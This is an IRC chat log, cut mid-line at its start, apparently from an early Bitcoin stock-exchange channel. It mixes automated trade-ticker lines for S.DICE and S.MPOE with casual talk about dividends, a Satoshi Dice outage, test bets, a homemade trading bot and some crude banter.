12.9256 BTC [-] Jan 26 11:15:24 [MPEX] [S.DICE] 600 @ 0.00654062 = 3.9244 BTC [+] Jan 26 11:15:26 [MPEX] [S.DICE] 1580 @ 0.00657713 = 10.3919 BTC [+] Jan 26 11:20:01 [MPEX] [S.MPOE] 19200 @ 0.00068898 = 13.2284 BTC [-] Jan 26 11:20:04 [HAVELOCK] [SDICE] 2 @ 0.59 = 1.18 BTC [+] Jan 26 11:21:02 [HAVELOCK] [SDICE] 40 @ 0.6099999 = 24.4 BTC [+] Jan 26 11:27:03 [HAVELOCK] [SDICE] 3 @ 0.62 = 1.86 BTC [+] Jan 26 11:29:02 [HAVELOCK] [SDICE] 10 @ 0.625 = 6.25 BTC [+] Jan 26 11:29:53 [MPEX] [S.DICE] 670 @ 0.00664351 = 4.4512 BTC [+] Jan 26 11:30:03 [HAVELOCK] [SDICE] 10 @ 0.635 = 6.35 BTC [+] Jan 26 11:38:02 [HAVELOCK] [SDICE] 20 @ 0.64 = 12.8 BTC [+] Jan 26 11:42:03 [MPEX] [S.MPOE] 8550 @ 0.00069636 = 5.9539 BTC [+] Jan 26 11:42:05 [MPEX] [S.MPOE] 7300 @ 0.00069631 = 5.0831 BTC [-] Jan 26 11:45:41 [MPEX] [S.MPOE] 10000 @ 0.000697 = 6.97 BTC [+] Jan 26 11:45:43 [MPEX] [S.MPOE] 673 @ 0.00069732 = 0.4693 BTC [+] Jan 26 11:46:02 [HAVELOCK] [SDICE] 10 @ 0.65 = 6.5 BTC [+] Jan 26 11:46:46 MPEx ‏@MPEx1 Jan 26 11:46:46 S.MPOE paid a total dividend of 2`531.16646003 BTC to 500`000`000 outstanding shares. #dividend #bitcoin #btc #stocks Jan 26 11:46:54 assbot doesn't report it for some reason Jan 26 11:48:48 first div announcement with its new api? Jan 26 11:49:18 yeh Jan 26 11:49:37 interests payments going out within the hour. Jan 26 11:54:32 [MPEX] [S.DICE] 2333 @ 0.00659999 = 15.3978 BTC [-] Jan 26 11:56:35 oh lol so i actually paid first :DDDD Jan 26 11:59:09 heh, margin for me again Jan 26 11:59:37 you're on bitfunder? Jan 26 11:59:46 yes Jan 26 12:00:00 congrats :D Jan 26 12:00:01 had 200 O Jan 26 12:00:49 plan to reinvest? Jan 26 12:01:19 jurov: btw. y do i still have 200? Jan 26 12:01:46 i can issue 100k shares, no prob Jan 26 12:02:05 oh you mean -O. no that was liquidated Jan 26 12:02:19 to reinvest, buy MPBPT-E Jan 26 12:02:48 or, there will me fresh March offering of -O later Jan 26 12:02:51 i know, just wondering why O is still in my assets in bitfunder Jan 26 12:03:32 ah so. Ukto said he said he disabled it completely, but he did not reset it yet Jan 26 12:03:56 will think about reinvesting, dunno where yet though Jan 26 12:06:56 [MPEX] [S.DICE] 980 @ 0.00659999 = 6.468 BTC [-] Jan 26 12:08:48 mpex dividend distributed to coinbr users, too Jan 26 12:20:51 Yup, nice 7.5 eurocents dividend, hrhrhr Jan 26 12:23:31 [MPEX] [S.DICE] 1453 @ 0.00659999 = 9.5898 BTC [-] Jan 26 12:32:26 [MPEX] [S.MPOE] 6000 @ 0.00069631 = 4.1779 BTC [-] Jan 26 12:33:29 okay, divs paid, bondholders paid, we're all clear. Jan 26 12:33:43 deposits, maybe? Jan 26 12:33:58 oh i got it already Jan 26 12:37:03 [MPEX] [S.MPOE] 3649 @ 0.00068898 = 2.5141 BTC [-] Jan 26 12:37:05 [MPEX] [S.MPOE] 3469 @ 0.0006885 = 2.3884 BTC [-] Jan 26 12:37:06 [MPEX] [S.MPOE] 2550 @ 0.00068796 = 1.7543 BTC [-] Jan 26 12:37:06 [MPEX] [S.MPOE] 3232 @ 0.00068433 = 2.2118 BTC [-] Jan 26 12:45:21 [MPEX] [S.MPOE] 100 @ 0.00069574 = 0.0696 BTC [+] Jan 26 12:45:22 [MPEX] [S.MPOE] 7500 @ 0.00069644 = 5.2233 BTC [+] Jan 26 12:48:16 hm ? Jan 26 12:52:43 kakobrekla https://bitcointalk.org/index.php?topic=138866.msg1480248#msg1480248 loller Jan 26 12:55:21 jurov "Noticed a few trades of CoinBr.MPBPT-O at 0.12" heh. Jan 26 13:02:56 [MPEX] [S.MPOE] 9700 @ 0.00068634 = 6.6575 BTC [-] Jan 26 13:11:03 [MPEX] [S.MPOE] 2950 @ 0.00068634 = 2.0247 BTC [-] Jan 26 13:14:47 [MPEX] [S.MPOE] 2050 @ 0.00068634 = 1.407 BTC [-] Jan 26 13:14:49 [MPEX] [S.MPOE] 5543 @ 0.00068433 = 3.7932 BTC [-] Jan 26 13:14:50 [MPEX] [S.MPOE] 7657 @ 0.00068403 = 5.2376 BTC [-] Jan 26 13:34:32 [MPEX] [S.DICE] 4890 @ 0.0065857 = 32.2041 BTC [-] Jan 26 13:38:12 [MPEX] [S.MPOE] 12150 @ 0.00069003 = 8.3839 BTC [+] Jan 26 13:39:41 [MPEX] [S.MPOE] 21950 @ 0.00068943 = 15.133 BTC [-] Jan 26 13:41:20 [MPEX] [S.DICE] 1300 @ 0.00659999 = 8.58 BTC [+] Jan 26 13:43:19 [MPEX] [S.MPOE] 12850 @ 0.00069003 = 8.8669 BTC [+] Jan 26 13:43:21 [MPEX] [S.MPOE] 9800 @ 0.00069004 = 6.7624 BTC [+] Jan 26 13:46:34 I already am a zillionaire Jan 26 13:46:39 gna gna Jan 26 13:47:16 [BTCTC] [BTC-BOND] 1000 @ 0.01 = 10 BTC [+] Jan 26 13:49:32 [MPEX] [S.MPOE] 7475 @ 0.00069004 = 5.158 BTC [+] Jan 26 13:50:37 satoshi dice down? Jan 26 13:53:27 [MPEX] [S.MPOE] 20800 @ 0.00069004 = 14.3528 BTC [+] Jan 26 13:58:06 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Jan 26 14:00:27 seems down to me too Jan 26 14:02:01 [MPEX] [S.DICE] 748 @ 0.0065857 = 4.9261 BTC [-] Jan 26 14:02:03 [MPEX] [S.DICE] 252 @ 0.0064388 = 1.6226 BTC [-] Jan 26 14:03:18 ;; ANSWER SECTION: Jan 26 14:03:18 satoshidice.com. 293 IN A 54.247.163.243 Jan 26 14:03:18 Error: "ANSWER" is not a valid command. Jan 26 14:03:20 is that their ip ? Jan 26 14:04:49 works now Jan 26 14:04:56 wait is the forum down ? Jan 26 14:05:14 [MPEX] [S.MPOE] 19650 @ 0.00069004 = 13.5593 BTC [+] Jan 26 14:06:03 [MPEX] [S.MPOE] 5600 @ 0.00068943 = 3.8608 BTC [-] Jan 26 14:08:18 [MPEX] [S.MPOE] 12800 @ 0.00068943 = 8.8247 BTC [-] Jan 26 14:08:19 [MPEX] [S.MPOE] 15827 @ 0.00068798 = 10.8887 BTC [-] Jan 26 14:09:02 which forum? Jan 26 14:10:02 btctalk Jan 26 14:10:05 but back nao Jan 26 14:11:18 sd still down for me :( Jan 26 14:11:42 are they being ddosed? Jan 26 14:11:46 possibly. Jan 26 14:11:54 anyone know an addy of theirs? Jan 26 14:11:55 that sucks Jan 26 14:12:00 ima send a little see if it answers. Jan 26 14:12:16 1diceDCd27Cc22HV3qPNZKwGnZ8QwhLTc Jan 26 14:12:18 1% Jan 26 14:12:22 91% Jan 26 14:12:59 i won lol Jan 26 14:13:02 1st time i won on sdice Jan 26 14:13:29 out .0105, in .0102 Jan 26 14:13:34 :) lots of betting action still on the blockchain Jan 26 14:13:34 so overall -.003 -.- Jan 26 14:23:34 [BTCTC] [BTC-BOND] 1033 @ 0.01 = 10.33 BTC [+] Jan 26 14:37:05 [MPEX] [S.MPOE] 8573 @ 0.00068798 = 5.8981 BTC [-] Jan 26 14:37:07 [MPEX] [S.MPOE] 193 @ 0.00068403 = 0.132 BTC [-] Jan 26 14:37:07 [MPEX] [S.MPOE] 21234 @ 0.00068373 = 14.5183 BTC [-] Jan 26 14:40:11 [MPEX] [S.MPOE] 3766 @ 0.00068373 = 2.5749 BTC [-] Jan 26 14:40:13 [MPEX] [S.MPOE] 1984 @ 0.00068084 = 1.3508 BTC [-] Jan 26 14:43:59 [MPEX] [S.DICE] 3610 @ 0.00659999 = 23.826 BTC [+] Jan 26 14:44:01 [MPEX] [S.DICE] 1470 @ 0.00661549 = 9.7248 BTC [+] Jan 26 14:44:02 [MPEX] [S.DICE] 5000 @ 0.0066442 = 33.221 BTC [+] Jan 26 14:44:04 [MPEX] [S.DICE] 1074 @ 0.00664421 = 7.1359 BTC [+] Jan 26 14:44:05 [MPEX] [S.DICE] 500 @ 0.00671202 = 3.356 BTC [+] Jan 26 14:44:06 [MPEX] [S.DICE] 1370 @ 0.00673092 = 9.2214 BTC [+] Jan 26 14:44:07 [MPEX] [S.DICE] 700 @ 0.00675475 = 4.7283 BTC [+] Jan 26 14:44:09 [MPEX] [S.DICE] 2709 @ 0.00675754 = 18.3062 BTC [+] Jan 26 14:44:10 [MPEX] [S.DICE] 300 @ 0.0067687 = 2.0306 BTC [+] Jan 26 14:44:11 [MPEX] [S.DICE] 1200 @ 0.00682498 = 8.19 BTC [+] Jan 26 14:44:12 [MPEX] [S.DICE] 1000 @ 0.00698 = 6.98 BTC [+] Jan 26 14:44:13 [MPEX] [S.DICE] 2411 @ 0.00699711 = 16.87 BTC [+] Jan 26 14:44:15 [MPEX] [S.DICE] 10900 @ 0.0069999 = 76.2989 BTC [+] Jan 26 14:44:16 [MPEX] [S.DICE] 10000 @ 0.0070999 = 70.999 BTC [+] Jan 26 14:44:16 [MPEX] [S.DICE] 10000 @ 0.0072999 = 72.999 BTC [+] Jan 26 14:44:17 [MPEX] [S.DICE] 10000 @ 0.0073899 = 73.899 BTC [+] Jan 26 14:44:18 [MPEX] [S.DICE] 50000 @ 0.00739 = 369.5 BTC [+] Jan 26 14:44:19 [MPEX] [S.DICE] 3000 @ 0.00739 = 22.17 BTC [+] Jan 26 14:44:20 [MPEX] [S.DICE] 10000 @ 0.00749 = 74.9 BTC [+] Jan 26 14:44:21 [MPEX] [S.DICE] 1324 @ 0.0075 = 9.93 BTC [+] Jan 26 14:44:24 u go girl Jan 26 14:44:54 dun dun dun Jan 26 14:44:58 whpa Jan 26 14:45:01 whoa 75 ? Jan 26 14:45:10 looks like i got sold Jan 26 14:45:37 !ticker m s.dice Jan 26 14:45:39 [MPEX:S.DICE] 1D: 0.00623493 / 0.00701656 / 0.0075 (175719 shares, 1,232.94 BTC), 7D: 0.00085848 / 0.00489105 / 0.0075 (1102184 shares, 5,390.84 BTC), 30D: 0.00085848 / 0.00422307 / 0.0075 (10417761 shares, 43,994.98 BTC) Jan 26 14:45:48 lol inb4 bugpowder explodes Jan 26 14:46:21 [MPEX] [S.DICE] 1200 @ 0.00702613 = 8.4314 BTC [-] Jan 26 14:46:38 [MPEX] [S.MPOE] 15000 @ 0.00068929 = 10.3394 BTC [+] Jan 26 14:46:40 [MPEX] [S.MPOE] 7675 @ 0.00069004 = 5.2961 BTC [+] Jan 26 14:46:41 [MPEX] [S.MPOE] 458 @ 0.00069573 = 0.3186 BTC [+] Jan 26 14:48:09 [MPEX] [S.DICE] 6058 @ 0.00702613 = 42.5643 BTC [-] Jan 26 14:53:44 [BTCTC] [GSDPT] 250 @ 0.0067 = 1.675 BTC [+] Jan 26 14:59:42 [MPEX] [S.MPOE] 1300 @ 0.00068084 = 0.8851 BTC [-] Jan 26 15:03:55 [MPEX] [S.MPOE] 9900 @ 0.00068084 = 6.7403 BTC [-] Jan 26 15:05:35 [BTCTC] [GSDPT] 500 @ 0.0068 = 3.4 BTC [+] Jan 26 15:07:59 [MPEX] [S.MPOE] 8900 @ 0.00068437 = 6.0909 BTC [+] Jan 26 15:10:32 sup with satoshi dice? Jan 26 15:10:56 site seems down / slow Jan 26 15:12:59 [MPEX] [S.MPOE] 6382 @ 0.00068084 = 4.3451 BTC [-] Jan 26 15:13:00 [MPEX] [S.MPOE] 16319 @ 0.00068057 = 11.1062 BTC [-] Jan 26 15:14:32 [MPEX] [S.DICE] 1719 @ 0.00705615 = 12.1295 BTC [+] Jan 26 15:15:39 was unreachable earlier too Jan 26 15:15:41 maybe some ddos Jan 26 15:16:56 yah Jan 26 15:17:09 was considering a panic sell Jan 26 15:17:17 then someone bought all my shares Jan 26 15:17:28 well Jan 26 15:17:36 I guess I should be happy Jan 26 15:17:36 lol Jan 26 15:17:48 Time to get some shares back Jan 26 15:17:51 mebby Jan 26 15:17:58 put a bid in at 18 Jan 26 15:20:02 oh ive got one down there for sure Jan 26 15:30:31 [MPEX] [S.MPOE] 15600 @ 0.00068166 = 10.6339 BTC [+] Jan 26 15:30:32 [MPEX] [S.MPOE] 131 @ 0.00068057 = 0.0892 BTC [-] Jan 26 15:30:33 [MPEX] [S.MPOE] 3362 @ 0.00068013 = 2.2866 BTC [-] Jan 26 15:33:58 http://antimisandry.com/general-blog-chat/proof-men-worthless-scumbags-5178.html Jan 26 15:34:02 sorta lulzy Jan 26 15:35:06 This is great Jan 26 15:35:10 last night I got bored Jan 26 15:35:18 and whipped up a bot in matlab Jan 26 15:35:23 just manual now Jan 26 15:35:34 but at least I can cancel all orders in a single keystroke Jan 26 15:35:44 and do market analysis and place a bunch as well Jan 26 15:35:50 wait you have a matlab mpex bot ?! Jan 26 15:35:57 yeah Jan 26 15:36:01 0.0 Jan 26 15:36:02 took about 3 hours Jan 26 15:36:03 os it ? Jan 26 15:36:04 0.1 Jan 26 15:36:21 I need to integrated it with the finance package Jan 26 15:36:42 but its a start Jan 26 15:37:06 It's like taking way to long to track all my positions by hand Jan 26 15:37:44 [MPEX] [S.MPOE] 2133 @ 0.00068437 = 1.4598 BTC [+] Jan 26 15:37:45 [MPEX] [S.MPOE] 15467 @ 0.00068472 = 10.5906 BTC [+] Jan 26 15:38:10 you should totally put it on github Jan 26 15:38:13 i'd like to link to that. Jan 26 15:38:36 no fucking way Jan 26 15:38:40 aww! Jan 26 15:38:49 but information wants to be free! Jan 26 15:39:49 TELL THAT TO Sergey Aleynikov Jan 26 15:40:20 honestly though Jan 26 15:40:26 did he serve in the end ? Jan 26 15:40:31 i haven't been following Jan 26 15:40:35 bitcoin is full of 'programmers' Jan 26 15:40:42 [MPEX] [S.MPOE] 10200 @ 0.00068013 = 6.9373 BTC [-] Jan 26 15:40:43 yeah. Jan 26 15:40:50 if they cant write a trading script on their own... Jan 26 15:41:02 maybe they are bad at the only thing they are good at Jan 26 15:41:11 well let's see... there's fewer spots more prestigious than the mpex faq, they're not in there for having written a mathlab script Jan 26 15:41:21 so i guess either too stupid to code or too stupid to know what to pick to code. Jan 26 15:41:39 What's the total user base of MPEX now? Jan 26 15:41:48 some hundreds Jan 26 15:41:52 666 Jan 26 15:41:58 lol something like that Jan 26 15:42:06 If the bot is good enough Jan 26 15:42:11 it might make sense to sell it Jan 26 15:42:25 or if the market competition heats up Jan 26 15:42:27 no cause information wants to be free and 30 btc is too much Jan 26 15:42:35 ha Jan 26 15:42:42 and also trilema should be free. Jan 26 15:42:48 I was gonna pay smickles 30 btc to code the bot Jan 26 15:42:56 but then I wrote most of it last night Jan 26 15:43:02 [MPEX] [S.BBET] 5000 @ 0.001139 = 5.695 BTC [+] Jan 26 15:43:06 and just paid him for time spent Jan 26 15:43:08 "i was gonna pay someone 500 dollah to write a script Jan 26 15:43:14 but then i started speccing it and now it's done" Jan 26 15:43:20 yea Jan 26 15:43:28 I didn't realize how easy it would be Jan 26 15:43:38 you brain surgeon you. Jan 26 15:43:49 JSON is my new friend Jan 26 15:43:56 still do lobotomy? Jan 26 15:44:06 json is evil in the sense lube is evil. Jan 26 15:44:07 and regexp is my wary acquaintance. Jan 26 15:46:13 [MPEX] [S.DICE] 1000 @ 0.00749898 = 7.499 BTC [+] Jan 26 15:46:15 [MPEX] [S.DICE] 1000 @ 0.007499 = 7.499 BTC [+] Jan 26 15:46:15 [MPEX] [S.DICE] 3300 @ 0.0075 = 24.75 BTC [+] Jan 26 15:47:50 [MPEX] [S.DICE] 1000 @ 0.00721288 = 7.2129 BTC [-] Jan 26 15:49:19 [MPEX] [S.DICE] 2409 @ 0.00749999 = 18.0675 BTC [+] Jan 26 15:51:27 oh man does the ponzi continue Jan 26 15:51:47 [MPEX] [S.MPOE] 468 @ 0.00068472 = 0.3204 BTC [+] Jan 26 15:51:49 [MPEX] [S.MPOE] 13000 @ 0.00069043 = 8.9756 BTC [+] Jan 26 15:51:50 [MPEX] [S.MPOE] 3765 @ 0.00069573 = 2.6194 BTC [+] Jan 26 15:52:10 haha did you make an update ? Jan 26 15:54:10 up 132% this month Jan 26 15:54:18 up exactly 200% since Dec 1 Jan 26 15:54:51 so funny how real businesses create value much faster than a ponzi Jan 26 15:55:21 That is in dollar terms Jan 26 15:56:14 only +77% in BTC terms this month Jan 26 15:57:07 yeah deflation makes it impossible to go broke Jan 26 15:57:54 Bugpowder i been sayin that for a while. Jan 26 15:58:05 hard to swallow for many. Jan 26 15:58:19 many dont swallow. Jan 26 15:58:22 hahaha Jan 26 15:58:24 i guess so. Jan 26 15:58:32 you know i've not met a girl that didn't in what, 20 years by now. Jan 26 15:59:17 unfortunatley bitcoin community is testosterone powered Jan 26 15:59:44 tha'ts a point Jan 26 16:00:03 it does not appeal to women in general Jan 26 16:00:04 for some reason Jan 26 16:00:30 until the partner makes 1000% roi Jan 26 16:00:36 then is all good! Jan 26 16:00:57 heheh Jan 26 16:01:46 lol Jan 26 16:01:51 experientia docent ? Jan 26 16:04:38 http://imgur.com/r/funny/Ziz6qIJ Jan 26 16:07:47 [MPEX] [S.DICE] 1000 @ 0.00726698 = 7.267 BTC [-] Jan 26 16:07:49 [MPEX] [S.DICE] 1000 @ 0.00749998 = 7.5 BTC [+] Jan 26 16:07:50 [MPEX] [S.DICE] 738 @ 0.00749999 = 5.535 BTC [+] Jan 26 16:08:40 [MPEX] [S.MPOE] 7000 @ 0.0006873 = 4.8111 BTC [-] Jan 26 16:08:41 [MPEX] [S.MPOE] 2800 @ 0.00068731 = 1.9245 BTC [+] Jan 26 16:08:43 [MPEX] [S.MPOE] 2250 @ 0.00069573 = 1.5654 BTC [+] Jan 26 16:08:53 this dice price is a little high i think Jan 26 16:08:56 mpoe too Jan 26 16:09:04 you didn't see last night Jan 26 16:09:09 up another 6k Jan 26 16:09:19 ah Jan 26 16:09:20 over 600k in bets Jan 26 16:09:25 around 20k in profits Jan 26 16:09:25 at this rate, bbet will be a good deal soon! lulz Jan 26 16:09:57 I think S.DICE price will float around 2% dividend EV Jan 26 16:10:19 its a number people can understand Jan 26 16:10:40 what's it at now? Jan 26 16:10:51 lets see Jan 26 16:11:00 it think profit is acutally around 17k Jan 26 16:11:12 hmm Jan 26 16:11:44 ;;calc 600000*.019/100000000/.0075 Jan 26 16:11:44 0.0152 Jan 26 16:11:52 1.52% EV Jan 26 16:12:00 ;;calc 17000/100000000/.0075 Jan 26 16:12:00 0.0226666666667 Jan 26 16:12:09 2.26% current Jan 26 16:12:31 [MPEX] [S.MPOE] 21700 @ 0.00068013 = 14.7588 BTC [-] Jan 26 16:13:33 all my shares got bot this morining tho Jan 26 16:13:43 im locked out! Jan 26 16:16:35 [MPEX] [S.MPOE] 14750 @ 0.00068013 = 10.0319 BTC [-] Jan 26 16:17:50 so its priced reasonably Jan 26 16:18:20 based on historical price / dividend yield Jan 26 16:18:22 yes Jan 26 16:18:41 S.MPOE seems a bit expensive Jan 26 16:18:45 i just hate to pay so much for something that cost me half that a few days ago Jan 26 16:18:51 BUT, much less regulatory risk there Jan 26 16:18:53 well Jan 26 16:19:08 S.DICE cost .0009 a few days ago for a lucky someone Jan 26 16:19:30 yeah :) Jan 26 16:19:46 [MPEX] [S.MPOE] 7000 @ 0.00069573 = 4.8701 BTC [+] Jan 26 16:20:36 Hey I wish I had my shares back too Jan 26 16:20:58 but I'm not upset about getting out at .007-.0075 Jan 26 16:22:40 as i always say, options mm-ing is the only business in the world where if you don't have customers you're depressed and if you do have them you're worried. Jan 26 16:22:44 seems shares work similarly. Jan 26 16:23:25 [MPEX] [S.MPOE] 15988 @ 0.00068013 = 10.8739 BTC [-] Jan 26 16:23:27 [MPEX] [S.MPOE] 26100 @ 0.00068012 = 17.7511 BTC [-] Jan 26 16:23:27 [MPEX] [S.MPOE] 18872 @ 0.00068001 = 12.8331 BTC [-] Jan 26 16:23:28 [MPEX] [S.MPOE] 17800 @ 0.00067851 = 12.0775 BTC [-] Jan 26 16:23:30 [MPEX] [S.MPOE] 16600 @ 0.00067717 = 11.241 BTC [-] Jan 26 16:23:31 [MPEX] [S.MPOE] 4640 @ 0.0006766 = 3.1394 BTC [-] Jan 26 16:24:24 [MPEX] [S.DICE] 500 @ 0.00749998 = 3.75 BTC [-] Jan 26 16:24:26 [MPEX] [S.DICE] 6853 @ 0.00749999 = 51.3974 BTC [+] Jan 26 16:24:27 [MPEX] [S.DICE] 1647 @ 0.0075 = 12.3525 BTC [+] Jan 26 16:25:23 satoshi dice is down again Jan 26 16:25:28 [MPEX] [S.MPOE] 11531 @ 0.0006766 = 7.8019 BTC [-] Jan 26 16:25:30 [MPEX] [S.MPOE] 32050 @ 0.00067567 = 21.6552 BTC [-] Jan 26 16:25:30 hopefully this will cause a panic sell Jan 26 16:25:31 [MPEX] [S.MPOE] 6419 @ 0.00067517 = 4.3339 BTC [-] Jan 26 16:25:36 into my bid at .0016 Jan 26 16:25:48 yup Jan 26 16:25:54 any details about the shutdown? Jan 26 16:25:56 [MPEX] [S.DICE] 4500 @ 0.0075 = 33.75 BTC [+] Jan 26 16:26:16 i'm surprised that the betting script is down aswell Jan 26 16:26:18 nope Jan 26 16:26:42 it would hilarous if I got out the morning it shut down, at the all time high Jan 26 16:26:47 because the adresses and algorithm linked doesn't need a front-end website Jan 26 16:27:56 oh so its down, down, not just the web site Jan 26 16:27:57 it'd be intelligent to separate and 2 differents servers the script and the website Jan 26 16:28:02 do they have a freenode channel? Jan 26 16:28:13 on* Jan 26 16:28:27 http://blockchain.info/ Jan 26 16:29:13 I think that it refund Jan 26 16:29:17 all the bets Jan 26 16:29:33 [MPEX] [S.DICE] 1000 @ 0.00721288 = 7.2129 BTC [-] Jan 26 16:30:32 Bugpowder do you hold some assets or only speculating S.DICE shares ? Jan 26 16:32:48 i'm surprised that the betting script is down aswell Jan 26 16:32:53 i was betting earlier just fine ? Jan 26 16:34:02 i just won again Jan 26 16:34:08 betting works fine Jan 26 16:34:10 alright good news Jan 26 16:34:19 StarenseN I just hang out here all day and have no assets Jan 26 16:34:36 -_- Jan 26 16:34:40 lol glbse! Jan 26 16:36:07 mircea_popescu are you sure, when i look to blockchain, adresses refund immediately Jan 26 16:36:23 c9e35452e695c96648a1834844e64d88720724a55aab66b257fccbbfc826e7a6 my bet Jan 26 16:36:32 e39cb60a469a05ffa14c84cb48949332592548d7ad9c7cdbabb102f85a4b09b7 Jan 26 16:36:32 my winningsd Jan 26 16:36:35 am i doing something wrong ? Jan 26 16:38:25 Total Input 149.36336849 BTC Jan 26 16:38:25 Total Output 149.36236849 BTC Jan 26 16:38:32 no winnings or ? Jan 26 16:38:36 what's that ? Jan 26 16:38:46 your bet : e39cb60a469a05ffa14c84cb48949332592548d7ad9c7cdbabb102f85a4b09b7 on blockchain Jan 26 16:38:49 i sent .1 (+0005 fee Jan 26 16:39:04 and i received .10660522 Jan 26 16:39:57 [MPEX] [S.MPOE] 6800 @ 0.0006883 = 4.6804 BTC [+] Jan 26 16:39:58 ok i get it Jan 26 16:40:16 i think it's right ? Jan 26 16:40:28 someone gave the addy earlier, should be kinda high odds to win Jan 26 16:41:33 how high do you think it will rise :) Jan 26 16:41:34 http://www.bitcoingem.com/ Jan 26 16:42:31 it won't without celebrity endorsment. Jan 26 16:42:31 Kbtcs ? :) Jan 26 16:42:36 people just don't know how to do anything Jan 26 16:42:45 they really believe their coding is all there is. Jan 26 16:42:54 [MPEX] [S.DICE] 500 @ 0.00749999 = 3.75 BTC [+] Jan 26 16:42:56 [MPEX] [S.DICE] 1350 @ 0.0075 = 10.125 BTC [+] Jan 26 16:47:04 the bitcoin gem Jan 26 16:47:10 funny idea Jan 26 16:47:19 300BTC Jan 26 16:47:21 [MPEX] [S.MPOE] 18100 @ 0.00067517 = 12.2206 BTC [-] Jan 26 16:47:47 3000BTC* Jan 26 16:47:50 :D Jan 26 16:48:13 <1 btc Jan 26 16:48:50 wow they take a 50% cut Jan 26 16:49:24 maybe I should code up the fabulous tulip site Jan 26 16:49:29 its a clever little tulip Jan 26 16:49:33 haha Bugpowder Jan 26 16:49:39 totally. Jan 26 16:50:08 let's get back to 2011 Jan 26 16:50:13 and be retarded all over again Jan 26 16:50:20 "because it works" and "think of the children" Jan 26 16:51:12 nice hat mircea_popescu Jan 26 16:51:20 which ? Jan 26 16:51:22 the funniest part is the one with the beacon Jan 26 16:51:30 the youtube vid Jan 26 16:51:41 o hey, i had a hat ?! Jan 26 16:51:46 link me lol Jan 26 16:51:59 [15:49] LOL, wtf is this https://www.youtube.com/watch?v=uuvMSjL6UcU ? Jan 26 16:52:24 a hehe. yeah. Jan 26 16:52:49 people had troubles for less than that Jan 26 16:52:51 it is a nice hat. best of san jose. Jan 26 16:52:57 StarenseN im a tough mofo. Jan 26 16:53:59 anyway, this is back before "the muslims" were "rioting" because "some film". Jan 26 16:54:15 apparently it wasn't exactly the film, now was it, seeing how if anyone ever gave a shit there'd be much better films to be had. Jan 26 16:54:54 only thing that boggles me is why would you make a open fire inside the house Jan 26 16:55:04 for allah. Jan 26 16:55:08 im sure it stank for a while Jan 26 16:55:10 and that other guy Jan 26 16:55:22 nah, i just opened the balcony door for an hour Jan 26 16:58:09 It's sad that people care about religions Jan 26 16:58:40 people don't give a shit about religions any more than they give a shit about all the rest of the meaningless drivel they use to complain about. Jan 26 16:58:50 you think neighbours calling the police actualyl care about the music ? Jan 26 16:58:59 they don't. they just feel lonely and ignored. Jan 26 16:59:39 [MPEX] [S.MPOE] 12050 @ 0.0006883 = 8.294 BTC [+] Jan 26 16:59:41 [MPEX] [S.MPOE] 130 @ 0.00068883 = 0.0895 BTC [+] Jan 26 17:00:32 You don't know him Jan 26 17:00:44 who don't i know ? Jan 26 17:00:52 it's easy to bury old footages Jan 26 17:01:08 but it's true that the video is wired and sad Jan 26 17:02:15 :D Jan 26 17:02:23 bitcointalk is sometime enough Jan 26 17:03:32 but as i can read, he's keen to do his actual business Jan 26 17:03:47 and i'm satisfied Jan 26 17:04:17 but all the ego stuff sometimes are borderline Jan 26 17:04:50 to stay polite Jan 26 17:07:57 [MPEX] [S.MPOE] 12200 @ 0.00068614 = 8.3709 BTC [-] Jan 26 17:09:45 nice to see you repaying usagi Jan 26 17:09:50 good luck Jan 26 17:10:40 https://bitcointalk.org/index.php?topic=139017.0 btw Jan 26 17:13:02 BugBot 0.2 activated Jan 26 17:13:06 bugbot ? Jan 26 17:13:17 jesus what's with the bot names. ass bot, bug bot, do you people hate your bots ? Jan 26 17:13:41 I will come up with a betterone Jan 26 17:13:47 betteronebot Jan 26 17:13:50 sounds legit Jan 26 17:13:51 SexyBot Jan 26 17:14:14 Boticelli Jan 26 17:14:18 EskimoBob: https://github.com/jwiegley/ledger Jan 26 17:16:14 What's the meaning of MPOE-PR ? Jan 26 17:16:39 yuck ;) Jan 26 17:16:46 old options trading page was called Mircea Popescu Options Emporium Jan 26 17:18:58 [MPEX] [S.MPOE] 6670 @ 0.00068883 = 4.5945 BTC [+] Jan 26 17:19:00 [MPEX] [S.MPOE] 46530 @ 0.00068927 = 32.0717 BTC [+] Jan 26 17:21:12 smickles: what will you charge to cook i mean do EskimoBob's books? Jan 26 17:21:58 :) Jan 26 17:22:01 [HAVELOCK] [SDICE] 8 @ 0.645 = 5.16 BTC [-] Jan 26 17:22:14 you did kill the litecoin price eventually Jan 26 17:22:46 cashing out to buy the kiln Jan 26 17:23:00 [HAVELOCK] [SDICE] 7 @ 0.6699999 = 4.69 BTC [+] Jan 26 17:36:27 [MPEX] [S.MPOE] 4300 @ 0.0006878 = 2.9575 BTC [-] Jan 26 17:36:28 [MPEX] [S.MPOE] 14200 @ 0.00068725 = 9.759 BTC [-] Jan 26 17:37:37 [MPEX] [S.MPOE] 10470 @ 0.00068927 = 7.2167 BTC [+] Jan 26 17:37:38 [MPEX] [S.MPOE] 15330 @ 0.00068943 = 10.569 BTC [+] Jan 26 17:42:05 pigeons: the cost of a bag of coal and one of those stick lighters, plus 2 btc/hr while they burn Jan 26 17:50:23 ya know, I could probably go double uber and do bo Jan 26 17:50:37 er, * bookkeeping 'by hand' in sed Jan 26 17:51:47 !ticker m s.mpoe Jan 26 17:51:48 [MPEX:S.MPOE] 1D: 0.0006175 / 0.00067994 / 0.0007 (2582876 shares, 1,756.21 BTC), 7D: 0.00059445 / 0.00065297 / 0.0007 (23780105 shares, 15,527.87 BTC), 30D: 0.00059445 / 0.00065195 / 0.0007 (53329141 shares, 34,768.04 BTC) Jan 26 17:51:49 !ticker m s.dice Jan 26 17:51:50 [MPEX:S.DICE] 1D: 0.00623493 / 0.00708425 / 0.0075 (209513 shares, 1,484.24 BTC), 7D: 0.00085848 / 0.00497091 / 0.0075 (1136369 shares, 5,648.80 BTC), 30D: 0.00085848 / 0.00423412 / 0.0075 (10454535 shares, 44,265.77 BTC) Jan 26 17:52:07 heh it takes the lead in 1d average too. Jan 26 17:53:59 [HAVELOCK] [SDICE] 3 @ 0.6699999 = 2.01 BTC [+] Jan 26 17:54:01 [HAVELOCK] [SDICE] 7 @ 0.67 = 4.69 BTC [+] Jan 26 17:55:00 [HAVELOCK] [SDICE] 2 @ 0.67 = 1.34 BTC [+] Jan 26 18:10:04 [HAVELOCK] [SDICE] 1 @ 0.67 BTC [+] Jan 26 18:10:06 [HAVELOCK] [SDICE] 5 @ 0.68 = 3.4 BTC [+] Jan 26 18:10:07 [HAVELOCK] 